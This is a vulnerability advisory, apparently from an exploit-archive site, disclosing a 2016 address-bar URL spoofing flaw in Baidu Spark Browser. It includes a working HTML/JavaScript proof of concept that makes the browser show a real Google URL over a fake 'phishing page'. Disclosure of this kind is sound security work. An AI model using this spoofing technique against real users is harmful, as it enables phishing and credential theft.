Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing

2016-05-06 / 2016-05-08
Credit: liu zhu
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- Exploit Title: Baidu Spark Browser URL spoof vulnerability Date:2016-05-02 Exploit Author: liu zhu Vendor Homepage:http://en.browser.baidu.com/ <http://en.browser.baidu.com/>Software Link:http://en.browser.baidu.com/query/fullpackage.exe?lang=en Version:43.23.1000.476 Tested on:Win7/WinXP details: The baidu spark browser is vulnerable to Address Bar Spoofing in the latest version of the browser(43.23.1000.476). Using the specail javascript code it was able to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks. it<http://thinks.it/> can be used to phinshing attack. PoC: ------------------------------------------------------------------------------------------------ --> <SCRIPT LANGUAGE="JavaScript"> function winopen() {OW=window.open("", "newwin"); OW.document.write("<TITLE>Google</TITLE>"); OW.document.write("<h1>The Phishing Page !!</h1>"); OW.document.close(); } </SCRIPT> <a href="https://www.google.com.hk/" target="newwin" onclick="setTimeout('winopen()', 1);">Google Home Page</a> <!-- ------------------------------------------------------------------------ Save it as a HTML file, and then execute it in Baidu Spark Browser. Affact: The vulnerability can be used to Phishing attack, Because the URL can be the same as the URL that the visitor wants to visit,but the content is fake. Contact: liuzhu09@huawei.com -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top